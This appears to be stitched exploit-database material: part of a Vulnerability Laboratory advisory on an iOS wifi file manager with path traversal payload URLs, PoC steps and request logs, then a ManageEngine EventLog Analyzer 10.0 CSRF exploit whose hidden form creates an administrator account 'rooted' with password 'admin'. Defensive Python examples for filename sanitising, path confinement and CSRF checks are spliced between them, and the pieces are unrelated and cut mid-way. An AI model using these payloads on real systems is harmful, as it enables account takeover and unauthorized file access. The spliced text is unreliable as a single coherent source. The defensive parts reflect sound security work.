Date=Tue, 12 May 2015 12:24:23 GMT



Reference(s):
http://localhost/upload


1.2
The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the android or ios application to your device
2. Start the application
3. Change the local devicename value in the ios settings to your own payload string (local command inject)
4. Save the settings
5. Open the wifi interface and watch the index webserver site
6. The execution occurs in the header location of the webpage where the devicename value is visible
7. Successful reproduce of the mobile web vulnerability!


PoC: 
<spna><img src="img/OYO.png" alt="OYO" style="margin-left:-30px;" height="87" width="87"><span>  </span>
<span style="font-size:20px;">[LOCAL COMMAND INJECT VULNERABILITY!]23</span>  <span style="font-size: 15px;color: #CCCCCC;">IOS Version 8.3</span>
            <span style="float:right;font-size:18px;width:400px;">
            <div class="progress">
                <div class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="1394098176.00" aria-valuemin="0" aria-valuemax="12.74" style="width:95.22%">
                    25.89 GB used</div>
<!--               <span style="font-size:10px;padding-left:20px;padding-bottom:5px;"> 1.30 GB Free Space</span>-->
<!-- Drag & drop files OR Just upload your Files-->
                <div class="progress-bar progress-bar-warning" role="progressbar" aria-valuenow="25.89 GB" aria-valuemin="0" aria-valuemax="12.74" style="width:4.78%">
                    1.30 GB free space
                </div></div></span></spna>



1.3
The path traversal web vulnerability can be exploited by remote attackers without user interaction or privileged web application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Payload(s)
http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/

--- PoC Session Logs [GET] ---

Status: 200[OK]
GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png
Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[59] Mime Type[application/json]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost/]
      Connection[keep-alive]
   Response Header:
      Server[GCDWebUploader]
      Cache-Control[no-cache]
      Content-Length[59]
      Content-Type[application/json]
      Connection[Close]
      Date[Tue, 12 May 2015 12:24:25 GMT]


14:21:43.214[9ms][total 9ms] Status: 200[OK]
GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost/]
      Connection[keep-alive]
   Response Header:
      Etag[8831597/1431433463/0]
      Last-Modified[Tue, 12 May 2015 12:24:23 GMT]
      Server[GCDWebUploader]
      Content-Type[image/png]
      Content-Length[538]
      Connection[Close]
      Date[Tue, 12 May 2015 12:24:25 GMT]
      Cache-Control[no-cache]




Reference(s):
http://localhost/list?path=
http://localhost/open?path=
http://localhost/download?path=


Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request. 
Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload.

1.2
Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks.

1.3
The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context.
Encode the input of files to folders and disallow special chars. Implement a whitelist or an exception to prevent unauthorized path value requests via GET method.
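The Wireless Photo Transfer solution above and items 1.1 to 1.3 here come down to the same three controls: reduce an uploaded filename to a single path component, confine a requested path to the share root, and HTML-encode any value echoed into the listing or header. The following is an added example of those controls in Python; it is not code from either application (both serve their wifi interface from an embedded HTTP server, GCDWebUploader in OYO's case). The function names and the `/srv/share` base directory are assumptions, and `resolve_within` expects the `path` parameter already percent-decoded, as a web framework would hand it over.

```python
"""Hardened handling of the three inputs named in the advisories above:
an uploaded `filename`, a requested `path`, and a device-supplied string
echoed into the page. Added example; not code from either application."""
import html
import os
import re
import unicodedata

# Anything outside this set is replaced, so separators and shell/HTML
# metacharacters never survive in a stored filename.
_UNSAFE = re.compile(r"[^A-Za-z0-9._ -]")


def sanitize_filename(raw):
    """Reduce an attacker-controlled filename to one safe path component.
    '/' and '\\' are both treated as separators, so '../x' and '..\\x' lose
    their directory part; leading dots are stripped so the result can never
    be '.', '..' or a hidden file."""
    name = raw.replace("\\", "/").rsplit("/", 1)[-1]
    name = unicodedata.normalize("NFKC", name)
    name = _UNSAFE.sub("_", name).strip(" .")
    if not name:
        raise ValueError("filename reduces to nothing: %r" % raw)
    return name[:255]


def resolve_within(base_dir, requested):
    """Map the (already percent-decoded) `path` parameter onto base_dir and
    refuse anything that resolves outside it. realpath also follows symlinks,
    so a link inside the share cannot be used to reach out of it."""
    base = os.path.realpath(base_dir)  # assumed share root, e.g. /srv/share
    # The client's path is always relative to the share root, even with a leading '/'.
    rel = requested.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(base, rel))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise ValueError("path escapes share root: %r" % requested)
    return candidate


def is_confined(base_dir, requested):
    """Boolean form of resolve_within for request filters that want a yes/no."""
    try:
        resolve_within(base_dir, requested)
        return True
    except ValueError:
        return False


def render_entry(display_name):
    """HTML-encode a name before it is placed in the listing or the header
    (the devicename of item 1.2), so persistent script in it stays inert."""
    return "<span>%s</span>" % html.escape(display_name, quote=True)


if __name__ == "__main__":
    # Constructed inputs in the shape of the advisories' payloads.
    print(sanitize_filename("../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png"))
    print(resolve_within("/srv/share", "/test23/photo.png"))
    print(is_confined("/srv/share", '"><../../../../../[DIRECTORY TRAVERSAL]>/PENG.png'))
    print(render_entry('"><b>My iPhone</b>'))
```

Note that the containment check compares resolved paths rather than looking for `..` in the input: a filter that only strips `..` is defeated by encoded or mixed-separator forms, whereas comparing the resolved candidate against the resolved root cannot be argued with.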


Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5)

1.2
The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6)

1.3
The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


            
<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link:
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL
-->

<html>
	<body>
    <form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
      <input type="hidden" name="domainId" value="" />
      <input type="hidden" name="roleId" value="" />
      <input type="hidden" name="addField" value="true" />
      <input type="hidden" name="userType" value="Administrator" />
      <input type="hidden" name="userName" value="rooted" />
      <input type="hidden" name="pwd1" value="admin" />
      <input type="hidden" name="password" value="admin" />
      <input type="hidden" name="userGroup" value="Administrator" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="AddSubmit" value="Add&#32;User" />
      <input type="hidden" name="alpha" value="" />
      <input type="hidden" name="userIds" value="" />
      <input type="hidden" name="roleName" value="" />
      <input type="hidden" name="selDevices" value="" />
      <input type="hidden" name="doAction" value="" />
      <input type="hidden" name="productName" value="eventlog" />
      <input type="hidden" name="licType" value="Prem" />
      <input type="hidden" name="next" value="" />
      <input type="hidden" name="currentUserId" value="1" />
      <input type="hidden" name="isAdminServer" value="false" />
      <input type="submit" value="Click Me" />
    </form>
  </body>
</html>
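The form above carries no anti-CSRF token, and when a victim's browser submits it from another site the request arrives with a foreign Origin (or Referer). Both are signals the server side should reject on. The following is an added example of such a check in Python, not ManageEngine code; `SITE_ORIGIN`, the session and form dictionaries, and the function names are placeholders for whatever the real framework provides.

```python
"""Server-side CSRF check for a state-changing form such as the user-management
POST targeted above. Added example, not ManageEngine code; SITE_ORIGIN and the
session/form dictionaries stand in for the framework's own objects."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://127.0.0.1:8400"  # scheme://host:port the application is served from


def issue_csrf_token(session):
    """Create one secret per session and reuse it; the server embeds it as a
    hidden field in every form that changes state, so a form built on another
    site cannot contain it."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def is_same_origin(headers):
    """Browsers attach an Origin header to cross-site POSTs (Referer is the
    fallback); a value other than SITE_ORIGIN means the request did not start
    on one of our pages. A request carrying neither header is refused."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def csrf_check(session, headers, form):
    """Return (allowed, reason). Both tests must pass: the origin check stops a
    forged request at the door, the token comparison catches a missing or
    guessed field. compare_digest keeps the comparison constant-time."""
    if not is_same_origin(headers):
        return False, "origin mismatch"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # Field subset taken from the PoC form above: it has no csrf_token field.
    forged = {"userName": "rooted", "userType": "Administrator", "AddSubmit": "Add User"}
    print(csrf_check(session, {"Origin": "http://other.example"}, forged))
    print(csrf_check(session, {"Origin": SITE_ORIGIN}, forged))
    print(csrf_check(session, {"Referer": SITE_ORIGIN + "/event/userManagementForm.do"},
                     dict(forged, csrf_token=token)))
```

The two checks are complementary: the origin check needs no change to the HTML but depends on the browser sending the header, while the token check works regardless of headers but requires every state-changing form to be rendered with the hidden field.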